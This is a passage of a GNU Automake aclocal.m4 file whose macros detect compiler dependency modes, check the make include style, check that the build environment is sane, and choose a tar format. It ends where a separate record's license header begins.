D'.\n rm -rf conftest.dir\n mkdir conftest.dir\n # Copy depcomp to subdir because otherwise we won't find it if we're\n # using a relative directory.\n cp \"$am_depcomp\" conftest.dir\n cd conftest.dir\n # We will build objects and dependencies in a subdirectory because\n # it helps to detect inapplicable dependency modes. For instance\n # both Tru64's cc and ICC support -MD to output dependencies as a\n # side effect of compilation, but ICC will put the dependencies in\n # the current directory while Tru64 will put them in the object\n # directory.\n mkdir sub\n\n am_cv_$1_dependencies_compiler_type=none\n if test \"$am_compiler_list\" = \"\"; then\n am_compiler_list=`sed -n ['s/^#*\\([a-zA-Z0-9]*\\))$/\\1/p'] < ./depcomp`\n fi\n am__universal=false\n m4_case([$1], [CC],\n [case \" $depcc \" in #(\n *\\ -arch\\ *\\ -arch\\ *) am__universal=true ;;\n esac],\n [CXX],\n [case \" $depcc \" in #(\n *\\ -arch\\ *\\ -arch\\ *) am__universal=true ;;\n esac])\n\n for depmode in $am_compiler_list; do\n # Setup a source with many dependencies, because some compilers\n # like to wrap large dependency lists on column 80 (with \\), and\n # we should not choose a depcomp mode which is confused by this.\n #\n # We need to recreate these files for each test, as the compiler may\n # overwrite some of them when testing with obscure command lines.\n # This happens at least with the AIX C compiler.\n : > sub/conftest.c\n for i in 1 2 3 4 5 6; do\n echo '#include \"conftst'$i'.h\"' >> sub/conftest.c\n # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with\n # Solaris 8's {/usr,}/bin/sh.\n touch sub/conftst$i.h\n done\n echo \"${am__include} ${am__quote}sub/conftest.Po${am__quote}\" > confmf\n\n # We check with `-c' and `-o' for the sake of the \"dashmstdout\"\n # mode. It turns out that the SunPro C++ compiler does not properly\n # handle `-M -o', and we need to detect this. Also, some Intel\n # versions had trouble with output in subdirs\n am__obj=sub/conftest.${OBJEXT-o}\n am__minus_obj=\"-o $am__obj\"\n case $depmode in\n gcc)\n # This depmode causes a compiler race in universal mode.\n test \"$am__universal\" = false || continue\n ;;\n nosideeffect)\n # after this tag, mechanisms are not by side-effect, so they'll\n # only be used when explicitly requested\n if test \"x$enable_dependency_tracking\" = xyes; then\n\tcontinue\n else\n\tbreak\n fi\n ;;\n msvc7 | msvc7msys | msvisualcpp | msvcmsys)\n # This compiler won't grok `-c -o', but also, the minuso test has\n # not run yet. These depmodes are late enough in the game, and\n # so weak that their functioning should not be impacted.\n am__obj=conftest.${OBJEXT-o}\n am__minus_obj=\n ;;\n none) break ;;\n esac\n if depmode=$depmode \\\n source=sub/conftest.c object=$am__obj \\\n depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \\\n $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \\\n >/dev/null 2>conftest.err &&\n grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 &&\n grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 &&\n grep $am__obj sub/conftest.Po > /dev/null 2>&1 &&\n ${MAKE-make} -s -f confmf > /dev/null 2>&1; then\n # icc doesn't choke on unknown options, it will just issue warnings\n # or remarks (even with -Werror). So we grep stderr for any message\n # that says an option was ignored or not supported.\n # When given -MP, icc 7.0 and 7.1 complain thusly:\n # icc: Command line warning: ignoring option '-M'; no argument required\n # The diagnosis changed in icc 8.0:\n # icc: Command line remark: option '-MP' not supported\n if (grep 'ignoring option' conftest.err ||\n grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else\n am_cv_$1_dependencies_compiler_type=$depmode\n break\n fi\n fi\n done\n\n cd ..\n rm -rf conftest.dir\nelse\n am_cv_$1_dependencies_compiler_type=none\nfi\n])\nAC_SUBST([$1DEPMODE], [depmode=$am_cv_$1_dependencies_compiler_type])\nAM_CONDITIONAL([am__fastdep$1], [\n test \"x$enable_dependency_tracking\" != xno \\\n && test \"$am_cv_$1_dependencies_compiler_type\" = gcc3])\n])\n\n\n# AM_SET_DEPDIR\n# -------------\n# Choose a directory name for dependency files.\n# This macro is AC_REQUIREd in _AM_DEPENDENCIES\nAC_DEFUN([AM_SET_DEPDIR],\n[AC_REQUIRE([AM_SET_LEADING_DOT])dnl\nAC_SUBST([DEPDIR], [\"${am__leading_dot}deps\"])dnl\n])\n\n\n# AM_DEP_TRACK\n# ------------\nAC_DEFUN([AM_DEP_TRACK],\n[AC_ARG_ENABLE(dependency-tracking,\n[ --disable-dependency-tracking speeds up one-time build\n --enable-dependency-tracking do not reject slow dependency extractors])\nif test \"x$enable_dependency_tracking\" != xno; then\n am_depcomp=\"$ac_aux_dir/depcomp\"\n AMDEPBACKSLASH='\\'\n am__nodep='_no'\nfi\nAM_CONDITIONAL([AMDEP], [test \"x$enable_dependency_tracking\" != xno])\nAC_SUBST([AMDEPBACKSLASH])dnl\n_AM_SUBST_NOTMAKE([AMDEPBACKSLASH])dnl\nAC_SUBST([am__nodep])dnl\n_AM_SUBST_NOTMAKE([am__nodep])dnl\n])\n\n# Generate code to set up dependency tracking. -*- Autoconf -*-\n\n# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n#serial 5\n\n# _AM_OUTPUT_DEPENDENCY_COMMANDS\n# ------------------------------\nAC_DEFUN([_AM_OUTPUT_DEPENDENCY_COMMANDS],\n[{\n # Autoconf 2.62 quotes --file arguments for eval, but not when files\n # are listed without --file. Let's play safe and only enable the eval\n # if we detect the quoting.\n case $CONFIG_FILES in\n *\\'*) eval set x \"$CONFIG_FILES\" ;;\n *) set x $CONFIG_FILES ;;\n esac\n shift\n for mf\n do\n # Strip MF so we end up with the name of the file.\n mf=`echo \"$mf\" | sed -e 's/:.*$//'`\n # Check whether this is an Automake generated Makefile or not.\n # We used to match only the files named `Makefile.in', but\n # some people rename them; so instead we look at the file content.\n # Grep'ing the first line is not enough: some people post-process\n # each Makefile.in and add a new line on top of each file to say so.\n # Grep'ing the whole file is not good either: AIX grep has a line\n # limit of 2048, but all sed's we know have understand at least 4000.\n if sed -n 's,^#.*generated by automake.*,X,p' \"$mf\" | grep X >/dev/null 2>&1; then\n dirpart=`AS_DIRNAME(\"$mf\")`\n else\n continue\n fi\n # Extract the definition of DEPDIR, am__include, and am__quote\n # from the Makefile without running `make'.\n DEPDIR=`sed -n 's/^DEPDIR = //p' < \"$mf\"`\n test -z \"$DEPDIR\" && continue\n am__include=`sed -n 's/^am__include = //p' < \"$mf\"`\n test -z \"am__include\" && continue\n am__quote=`sed -n 's/^am__quote = //p' < \"$mf\"`\n # When using ansi2knr, U may be empty or an underscore; expand it\n U=`sed -n 's/^U = //p' < \"$mf\"`\n # Find all dependency output files, they are included files with\n # $(DEPDIR) in their names. We invoke sed twice because it is the\n # simplest approach to changing $(DEPDIR) to its actual value in the\n # expansion.\n for file in `sed -n \"\n s/^$am__include $am__quote\\(.*(DEPDIR).*\\)$am__quote\"'$/\\1/p' <\"$mf\" | \\\n\t sed -e 's/\\$(DEPDIR)/'\"$DEPDIR\"'/g' -e 's/\\$U/'\"$U\"'/g'`; do\n # Make sure the directory exists.\n test -f \"$dirpart/$file\" && continue\n fdir=`AS_DIRNAME([\"$file\"])`\n AS_MKDIR_P([$dirpart/$fdir])\n # echo \"creating $dirpart/$file\"\n echo '# dummy' > \"$dirpart/$file\"\n done\n done\n}\n])# _AM_OUTPUT_DEPENDENCY_COMMANDS\n\n\n# AM_OUTPUT_DEPENDENCY_COMMANDS\n# -----------------------------\n# This macro should only be invoked once -- use via AC_REQUIRE.\n#\n# This code is only required when automatic dependency tracking\n# is enabled. FIXME. This creates each `.P' file that we will\n# need in order to bootstrap the dependency handling code.\nAC_DEFUN([AM_OUTPUT_DEPENDENCY_COMMANDS],\n[AC_CONFIG_COMMANDS([depfiles],\n [test x\"$AMDEP_TRUE\" != x\"\" || _AM_OUTPUT_DEPENDENCY_COMMANDS],\n [AMDEP_TRUE=\"$AMDEP_TRUE\" ac_aux_dir=\"$ac_aux_dir\"])\n])\n\n# Do all the work for Automake. -*- Autoconf -*-\n\n# Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004,\n# 2005, 2006, 2008, 2009 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 16\n\n# This macro actually does too much. Some checks are only needed if\n# your package does certain things. But this isn't really a big deal.\n\n# AM_INIT_AUTOMAKE(PACKAGE, VERSION, [NO-DEFINE])\n# AM_INIT_AUTOMAKE([OPTIONS])\n# -----------------------------------------------\n# The call with PACKAGE and VERSION arguments is the old style\n# call (pre autoconf-2.50), which is being phased out. PACKAGE\n# and VERSION should now be passed to AC_INIT and removed from\n# the call to AM_INIT_AUTOMAKE.\n# We support both call styles for the transition. After\n# the next Automake release, Autoconf can make the AC_INIT\n# arguments mandatory, and then we can depend on a new Autoconf\n# release and drop the old call support.\nAC_DEFUN([AM_INIT_AUTOMAKE],\n[AC_PREREQ([2.62])dnl\ndnl Autoconf wants to disallow AM_ names. We explicitly allow\ndnl the ones we care about.\nm4_pattern_allow([^AM_[A-Z]+FLAGS$])dnl\nAC_REQUIRE([AM_SET_CURRENT_AUTOMAKE_VERSION])dnl\nAC_REQUIRE([AC_PROG_INSTALL])dnl\nif test \"`cd $srcdir && pwd`\" != \"`pwd`\"; then\n # Use -I$(srcdir) only when $(srcdir) != ., so that make's output\n # is not polluted with repeated \"-I.\"\n AC_SUBST([am__isrc], [' -I$(srcdir)'])_AM_SUBST_NOTMAKE([am__isrc])dnl\n # test to see if srcdir already configured\n if test -f $srcdir/config.status; then\n AC_MSG_ERROR([source directory already configured; run \"make distclean\" there first])\n fi\nfi\n\n# test whether we have cygpath\nif test -z \"$CYGPATH_W\"; then\n if (cygpath --version) >/dev/null 2>/dev/null; then\n CYGPATH_W='cygpath -w'\n else\n CYGPATH_W=echo\n fi\nfi\nAC_SUBST([CYGPATH_W])\n\n# Define the identity of the package.\ndnl Distinguish between old-style and new-style calls.\nm4_ifval([$2],\n[m4_ifval([$3], [_AM_SET_OPTION([no-define])])dnl\n AC_SUBST([PACKAGE], [$1])dnl\n AC_SUBST([VERSION], [$2])],\n[_AM_SET_OPTIONS([$1])dnl\ndnl Diagnose old-style AC_INIT with new-style AM_AUTOMAKE_INIT.\nm4_if(m4_ifdef([AC_PACKAGE_NAME], 1)m4_ifdef([AC_PACKAGE_VERSION], 1), 11,,\n [m4_fatal([AC_INIT should be called with package and version arguments])])dnl\n AC_SUBST([PACKAGE], ['AC_PACKAGE_TARNAME'])dnl\n AC_SUBST([VERSION], ['AC_PACKAGE_VERSION'])])dnl\n\n_AM_IF_OPTION([no-define],,\n[AC_DEFINE_UNQUOTED(PACKAGE, \"$PACKAGE\", [Name of package])\n AC_DEFINE_UNQUOTED(VERSION, \"$VERSION\", [Version number of package])])dnl\n\n# Some tools Automake needs.\nAC_REQUIRE([AM_SANITY_CHECK])dnl\nAC_REQUIRE([AC_ARG_PROGRAM])dnl\nAM_MISSING_PROG(ACLOCAL, aclocal-${am__api_version})\nAM_MISSING_PROG(AUTOCONF, autoconf)\nAM_MISSING_PROG(AUTOMAKE, automake-${am__api_version})\nAM_MISSING_PROG(AUTOHEADER, autoheader)\nAM_MISSING_PROG(MAKEINFO, makeinfo)\nAC_REQUIRE([AM_PROG_INSTALL_SH])dnl\nAC_REQUIRE([AM_PROG_INSTALL_STRIP])dnl\nAC_REQUIRE([AM_PROG_MKDIR_P])dnl\n# We need awk for the \"check\" target. The system \"awk\" is bad on\n# some platforms.\nAC_REQUIRE([AC_PROG_AWK])dnl\nAC_REQUIRE([AC_PROG_MAKE_SET])dnl\nAC_REQUIRE([AM_SET_LEADING_DOT])dnl\n_AM_IF_OPTION([tar-ustar], [_AM_PROG_TAR([ustar])],\n\t [_AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])],\n\t\t\t [_AM_PROG_TAR([v7])])])\n_AM_IF_OPTION([no-dependencies],,\n[AC_PROVIDE_IFELSE([AC_PROG_CC],\n\t\t [_AM_DEPENDENCIES(CC)],\n\t\t [define([AC_PROG_CC],\n\t\t\t defn([AC_PROG_CC])[_AM_DEPENDENCIES(CC)])])dnl\nAC_PROVIDE_IFELSE([AC_PROG_CXX],\n\t\t [_AM_DEPENDENCIES(CXX)],\n\t\t [define([AC_PROG_CXX],\n\t\t\t defn([AC_PROG_CXX])[_AM_DEPENDENCIES(CXX)])])dnl\nAC_PROVIDE_IFELSE([AC_PROG_OBJC],\n\t\t [_AM_DEPENDENCIES(OBJC)],\n\t\t [define([AC_PROG_OBJC],\n\t\t\t defn([AC_PROG_OBJC])[_AM_DEPENDENCIES(OBJC)])])dnl\n])\n_AM_IF_OPTION([silent-rules], [AC_REQUIRE([AM_SILENT_RULES])])dnl\ndnl The `parallel-tests' driver may need to know about EXEEXT, so add the\ndnl `am__EXEEXT' conditional if _AM_COMPILER_EXEEXT was seen. This macro\ndnl is hooked onto _AC_COMPILER_EXEEXT early, see below.\nAC_CONFIG_COMMANDS_PRE(dnl\n[m4_provide_if([_AM_COMPILER_EXEEXT],\n [AM_CONDITIONAL([am__EXEEXT], [test -n \"$EXEEXT\"])])])dnl\n])\n\ndnl Hook into `_AC_COMPILER_EXEEXT' early to learn its expansion. Do not\ndnl add the conditional right here, as _AC_COMPILER_EXEEXT may be further\ndnl mangled by Autoconf and run in a shell conditional statement.\nm4_define([_AC_COMPILER_EXEEXT],\nm4_defn([_AC_COMPILER_EXEEXT])[m4_provide([_AM_COMPILER_EXEEXT])])\n\n\n# When config.status generates a header, we must update the stamp-h file.\n# This file resides in the same directory as the config header\n# that is generated. The stamp files are numbered to have different names.\n\n# Autoconf calls _AC_AM_CONFIG_HEADER_HOOK (when defined) in the\n# loop where config.status creates the headers, so we can generate\n# our stamp files there.\nAC_DEFUN([_AC_AM_CONFIG_HEADER_HOOK],\n[# Compute $1's index in $config_headers.\n_am_arg=$1\n_am_stamp_count=1\nfor _am_header in $config_headers :; do\n case $_am_header in\n $_am_arg | $_am_arg:* )\n break ;;\n * )\n _am_stamp_count=`expr $_am_stamp_count + 1` ;;\n esac\ndone\necho \"timestamp for $_am_arg\" >`AS_DIRNAME([\"$_am_arg\"])`/stamp-h[]$_am_stamp_count])\n\n# Copyright (C) 2001, 2003, 2005, 2008, 2011 Free Software Foundation,\n# Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_PROG_INSTALL_SH\n# ------------------\n# Define $install_sh.\nAC_DEFUN([AM_PROG_INSTALL_SH],\n[AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl\nif test x\"${install_sh}\" != xset; then\n case $am_aux_dir in\n *\\ * | *\\\t*)\n install_sh=\"\\${SHELL} '$am_aux_dir/install-sh'\" ;;\n *)\n install_sh=\"\\${SHELL} $am_aux_dir/install-sh\"\n esac\nfi\nAC_SUBST(install_sh)])\n\n# Copyright (C) 2003, 2005 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 2\n\n# Check whether the underlying file-system supports filenames\n# with a leading dot. For instance MS-DOS doesn't.\nAC_DEFUN([AM_SET_LEADING_DOT],\n[rm -rf .tst 2>/dev/null\nmkdir .tst 2>/dev/null\nif test -d .tst; then\n am__leading_dot=.\nelse\n am__leading_dot=_\nfi\nrmdir .tst 2>/dev/null\nAC_SUBST([am__leading_dot])])\n\n# Add --enable-maintainer-mode option to configure. -*- Autoconf -*-\n# From Jim Meyering\n\n# Copyright (C) 1996, 1998, 2000, 2001, 2002, 2003, 2004, 2005, 2008,\n# 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 5\n\n# AM_MAINTAINER_MODE([DEFAULT-MODE])\n# ----------------------------------\n# Control maintainer-specific portions of Makefiles.\n# Default is to disable them, unless `enable' is passed literally.\n# For symmetry, `disable' may be passed as well. Anyway, the user\n# can override the default with the --enable/--disable switch.\nAC_DEFUN([AM_MAINTAINER_MODE],\n[m4_case(m4_default([$1], [disable]),\n [enable], [m4_define([am_maintainer_other], [disable])],\n [disable], [m4_define([am_maintainer_other], [enable])],\n [m4_define([am_maintainer_other], [enable])\n m4_warn([syntax], [unexpected argument to AM@&t@_MAINTAINER_MODE: $1])])\nAC_MSG_CHECKING([whether to enable maintainer-specific portions of Makefiles])\n dnl maintainer-mode's default is 'disable' unless 'enable' is passed\n AC_ARG_ENABLE([maintainer-mode],\n[ --][am_maintainer_other][-maintainer-mode am_maintainer_other make rules and dependencies not useful\n\t\t\t (and sometimes confusing) to the casual installer],\n [USE_MAINTAINER_MODE=$enableval],\n [USE_MAINTAINER_MODE=]m4_if(am_maintainer_other, [enable], [no], [yes]))\n AC_MSG_RESULT([$USE_MAINTAINER_MODE])\n AM_CONDITIONAL([MAINTAINER_MODE], [test $USE_MAINTAINER_MODE = yes])\n MAINT=$MAINTAINER_MODE_TRUE\n AC_SUBST([MAINT])dnl\n]\n)\n\nAU_DEFUN([jm_MAINTAINER_MODE], [AM_MAINTAINER_MODE])\n\n# Check to see how 'make' treats includes.\t -*- Autoconf -*-\n\n# Copyright (C) 2001, 2002, 2003, 2005, 2009 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 4\n\n# AM_MAKE_INCLUDE()\n# -----------------\n# Check to see how make treats includes.\nAC_DEFUN([AM_MAKE_INCLUDE],\n[am_make=${MAKE-make}\ncat > confinc << 'END'\nam__doit:\n\t@echo this is the am__doit target\n.PHONY: am__doit\nEND\n# If we don't find an include directive, just comment out the code.\nAC_MSG_CHECKING([for style of include used by $am_make])\nam__include=\"#\"\nam__quote=\n_am_result=none\n# First try GNU make style include.\necho \"include confinc\" > confmf\n# Ignore all kinds of additional output from `make'.\ncase `$am_make -s -f confmf 2> /dev/null` in #(\n*the\\ am__doit\\ target*)\n am__include=include\n am__quote=\n _am_result=GNU\n ;;\nesac\n# Now try BSD make style include.\nif test \"$am__include\" = \"#\"; then\n echo '.include \"confinc\"' > confmf\n case `$am_make -s -f confmf 2> /dev/null` in #(\n *the\\ am__doit\\ target*)\n am__include=.include\n am__quote=\"\\\"\"\n _am_result=BSD\n ;;\n esac\nfi\nAC_SUBST([am__include])\nAC_SUBST([am__quote])\nAC_MSG_RESULT([$_am_result])\nrm -f confinc confmf\n])\n\n# Fake the existence of programs that GNU maintainers use. -*- Autoconf -*-\n\n# Copyright (C) 1997, 1999, 2000, 2001, 2003, 2004, 2005, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 6\n\n# AM_MISSING_PROG(NAME, PROGRAM)\n# ------------------------------\nAC_DEFUN([AM_MISSING_PROG],\n[AC_REQUIRE([AM_MISSING_HAS_RUN])\n$1=${$1-\"${am_missing_run}$2\"}\nAC_SUBST($1)])\n\n\n# AM_MISSING_HAS_RUN\n# ------------------\n# Define MISSING if not defined so far and test if it supports --run.\n# If it does, set am_missing_run to use it, otherwise, to nothing.\nAC_DEFUN([AM_MISSING_HAS_RUN],\n[AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl\nAC_REQUIRE_AUX_FILE([missing])dnl\nif test x\"${MISSING+set}\" != xset; then\n case $am_aux_dir in\n *\\ * | *\\\t*)\n MISSING=\"\\${SHELL} \\\"$am_aux_dir/missing\\\"\" ;;\n *)\n MISSING=\"\\${SHELL} $am_aux_dir/missing\" ;;\n esac\nfi\n# Use eval to expand $SHELL\nif eval \"$MISSING --run true\"; then\n am_missing_run=\"$MISSING --run \"\nelse\n am_missing_run=\n AC_MSG_WARN([`missing' script is too old or missing])\nfi\n])\n\n# Copyright (C) 2003, 2004, 2005, 2006, 2011 Free Software Foundation,\n# Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_PROG_MKDIR_P\n# ---------------\n# Check for `mkdir -p'.\nAC_DEFUN([AM_PROG_MKDIR_P],\n[AC_PREREQ([2.60])dnl\nAC_REQUIRE([AC_PROG_MKDIR_P])dnl\ndnl Automake 1.8 to 1.9.6 used to define mkdir_p. We now use MKDIR_P,\ndnl while keeping a definition of mkdir_p for backward compatibility.\ndnl @MKDIR_P@ is magic: AC_OUTPUT adjusts its value for each Makefile.\ndnl However we cannot define mkdir_p as $(MKDIR_P) for the sake of\ndnl Makefile.ins that do not define MKDIR_P, so we do our own\ndnl adjustment using top_builddir (which is defined more often than\ndnl MKDIR_P).\nAC_SUBST([mkdir_p], [\"$MKDIR_P\"])dnl\ncase $mkdir_p in\n [[\\\\/$]]* | ?:[[\\\\/]]*) ;;\n */*) mkdir_p=\"\\$(top_builddir)/$mkdir_p\" ;;\nesac\n])\n\n# Helper functions for option handling. -*- Autoconf -*-\n\n# Copyright (C) 2001, 2002, 2003, 2005, 2008, 2010 Free Software\n# Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 5\n\n# _AM_MANGLE_OPTION(NAME)\n# -----------------------\nAC_DEFUN([_AM_MANGLE_OPTION],\n[[_AM_OPTION_]m4_bpatsubst($1, [[^a-zA-Z0-9_]], [_])])\n\n# _AM_SET_OPTION(NAME)\n# --------------------\n# Set option NAME. Presently that only means defining a flag for this option.\nAC_DEFUN([_AM_SET_OPTION],\n[m4_define(_AM_MANGLE_OPTION([$1]), 1)])\n\n# _AM_SET_OPTIONS(OPTIONS)\n# ------------------------\n# OPTIONS is a space-separated list of Automake options.\nAC_DEFUN([_AM_SET_OPTIONS],\n[m4_foreach_w([_AM_Option], [$1], [_AM_SET_OPTION(_AM_Option)])])\n\n# _AM_IF_OPTION(OPTION, IF-SET, [IF-NOT-SET])\n# -------------------------------------------\n# Execute IF-SET if OPTION is set, IF-NOT-SET otherwise.\nAC_DEFUN([_AM_IF_OPTION],\n[m4_ifset(_AM_MANGLE_OPTION([$1]), [$2], [$3])])\n\n# Check to make sure that the build environment is sane. -*- Autoconf -*-\n\n# Copyright (C) 1996, 1997, 2000, 2001, 2003, 2005, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 5\n\n# AM_SANITY_CHECK\n# ---------------\nAC_DEFUN([AM_SANITY_CHECK],\n[AC_MSG_CHECKING([whether build environment is sane])\n# Just in case\nsleep 1\necho timestamp > conftest.file\n# Reject unsafe characters in $srcdir or the absolute working directory\n# name. Accept space and tab only in the latter.\nam_lf='\n'\ncase `pwd` in\n *[[\\\\\\\"\\#\\$\\&\\'\\`$am_lf]]*)\n AC_MSG_ERROR([unsafe absolute working directory name]);;\nesac\ncase $srcdir in\n *[[\\\\\\\"\\#\\$\\&\\'\\`$am_lf\\ \\\t]]*)\n AC_MSG_ERROR([unsafe srcdir value: `$srcdir']);;\nesac\n\n# Do `set' in a subshell so we don't clobber the current shell's\n# arguments. Must try -L first in case configure is actually a\n# symlink; some systems play weird games with the mod time of symlinks\n# (eg FreeBSD returns the mod time of the symlink's containing\n# directory).\nif (\n set X `ls -Lt \"$srcdir/configure\" conftest.file 2> /dev/null`\n if test \"$[*]\" = \"X\"; then\n # -L didn't work.\n set X `ls -t \"$srcdir/configure\" conftest.file`\n fi\n rm -f conftest.file\n if test \"$[*]\" != \"X $srcdir/configure conftest.file\" \\\n && test \"$[*]\" != \"X conftest.file $srcdir/configure\"; then\n\n # If neither matched, then we have a broken ls. This can happen\n # if, for instance, CONFIG_SHELL is bash and it inherits a\n # broken ls alias from the environment. This has actually\n # happened. Such a system could not be considered \"sane\".\n AC_MSG_ERROR([ls -t appears to fail. Make sure there is not a broken\nalias in your environment])\n fi\n\n test \"$[2]\" = conftest.file\n )\nthen\n # Ok.\n :\nelse\n AC_MSG_ERROR([newly created file is older than distributed files!\nCheck your system clock])\nfi\nAC_MSG_RESULT(yes)])\n\n# Copyright (C) 2001, 2003, 2005, 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_PROG_INSTALL_STRIP\n# ---------------------\n# One issue with vendor `install' (even GNU) is that you can't\n# specify the program used to strip binaries. This is especially\n# annoying in cross-compiling environments, where the build's strip\n# is unlikely to handle the host's binaries.\n# Fortunately install-sh will honor a STRIPPROG variable, so we\n# always use install-sh in `make install-strip', and initialize\n# STRIPPROG with the value of the STRIP variable (set by the user).\nAC_DEFUN([AM_PROG_INSTALL_STRIP],\n[AC_REQUIRE([AM_PROG_INSTALL_SH])dnl\n# Installed binaries are usually stripped using `strip' when the user\n# run `make install-strip'. However `strip' might not be the right\n# tool to use in cross-compilation environments, therefore Automake\n# will honor the `STRIP' environment variable to overrule this program.\ndnl Don't test for $cross_compiling = yes, because it might be `maybe'.\nif test \"$cross_compiling\" != no; then\n AC_CHECK_TOOL([STRIP], [strip], :)\nfi\nINSTALL_STRIP_PROGRAM=\"\\$(install_sh) -c -s\"\nAC_SUBST([INSTALL_STRIP_PROGRAM])])\n\n# Copyright (C) 2006, 2008, 2010 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 3\n\n# _AM_SUBST_NOTMAKE(VARIABLE)\n# ---------------------------\n# Prevent Automake from outputting VARIABLE = @VARIABLE@ in Makefile.in.\n# This macro is traced by Automake.\nAC_DEFUN([_AM_SUBST_NOTMAKE])\n\n# AM_SUBST_NOTMAKE(VARIABLE)\n# --------------------------\n# Public sister of _AM_SUBST_NOTMAKE.\nAC_DEFUN([AM_SUBST_NOTMAKE], [_AM_SUBST_NOTMAKE($@)])\n\n# Check how to create a tarball. -*- Autoconf -*-\n\n# Copyright (C) 2004, 2005, 2012 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 2\n\n# _AM_PROG_TAR(FORMAT)\n# --------------------\n# Check how to create a tarball in format FORMAT.\n# FORMAT should be one of `v7', `ustar', or `pax'.\n#\n# Substitute a variable $(am__tar) that is a command\n# writing to stdout a FORMAT-tarball containing the directory\n# $tardir.\n# tardir=directory && $(am__tar) > result.tar\n#\n# Substitute a variable $(am__untar) that extract such\n# a tarball read from stdin.\n# $(am__untar) < result.tar\nAC_DEFUN([_AM_PROG_TAR],\n[# Always define AMTAR for backward compatibility. Yes, it's still used\n# in the wild :-( We should find a proper way to deprecate it ...\nAC_SUBST([AMTAR], ['$${TAR-tar}'])\nm4_if([$1], [v7],\n [am__tar='$${TAR-tar} chof - \"$$tardir\"' am__untar='$${TAR-tar} xf -'],\n [m4_case([$1], [ustar],, [pax],,\n [m4_fatal([Unknown tar format])])\nAC_MSG_CHECKING([how to create a $1 tar archive])\n# Loop over all known methods to create a tar archive until one works.\n_am_tools='gnutar m4_if([$1], [ustar], [plaintar]) pax cpio none'\n_am_tools=${am_cv_prog_tar_$1-$_am_tools}\n# Do not fold the above two line into one, because Tru64 sh and\n# Solaris sh will not grok spaces in the rhs of `-'.\nfor _am_tool in $_am_tools\ndo\n case $_am_tool in\n gnutar)\n for _am_tar in tar gnutar gtar;\n do\n AM_RUN_LOG([$_am_tar --version]) && break\n done\n am__tar=\"$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - \"'\"$$tardir\"'\n am__tar_=\"$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - \"'\"$tardir\"'\n am__untar=\"$_am_tar -xf -\"\n ;;\n plaintar)\n # Must skip GNU tar: if it does not support --format= it doesn't create\n # ustar tarball either.\n (tar --version) >/dev/null 2>&1 && continue\n am__tar='tar chf - \"$$tardir\"'\n am__tar_='tar chf - \"$tardir\"'\n am__untar='tar xf -'\n ;;\n pax)\n am__tar='pax -L -x $1 -w \"$$tardir\"'\n am__tar_='pax -L -x $1 -w \"$tardir\"'\n am__untar='pax -r'\n ;;\n cpio)\n am__tar='find \"$$tardir\" -print | cpio -o -H $1 -L'\n am__tar_='find \"$tardir\" -print | cpio -o -H $1 -L'\n am__untar='cpio -i -H $1 -d'\n ;;\n none)\n am__tar=false\n am__tar_=false\n am__untar=false\n ;;\n esac\n\n # If the value was cached, stop now. We just wanted to have am__tar\n # and am__untar set.\n test -n \"${am_cv_prog_tar_$1}\" && break\n\n # tar/untar a dummy directory, and stop if the command works\n rm -rf conftest.dir\n mkdir conftest.dir\n echo GrepMe > conftest.dir/file\n AM_RUN_LOG([tardir=conftest.dir && eval $am__tar_ >conftest.tar])\n rm -rf conftest.dir\n if test -s conftest.tar; then\n AM_RUN_LOG([$am__untar /dev/null 2>&1 && break\n fi\ndone\nrm -rf conftest.dir\n\nAC_CACHE_VAL([am_cv_prog_tar_$1], [am_cv_prog_tar_$1=$_am_tool])\nAC_MSG_RESULT([$am_cv_prog_tar_$1])])\nAC_SUBST([am__tar])\nAC_SUBST([am__untar])\n]) # _AM_PROG_TAR\n\nm4_include([../../../acinclude.m4])\n"} {"text": "/***********************license start***************\n * Copyright (c) 2003-2010 Cavium Networks 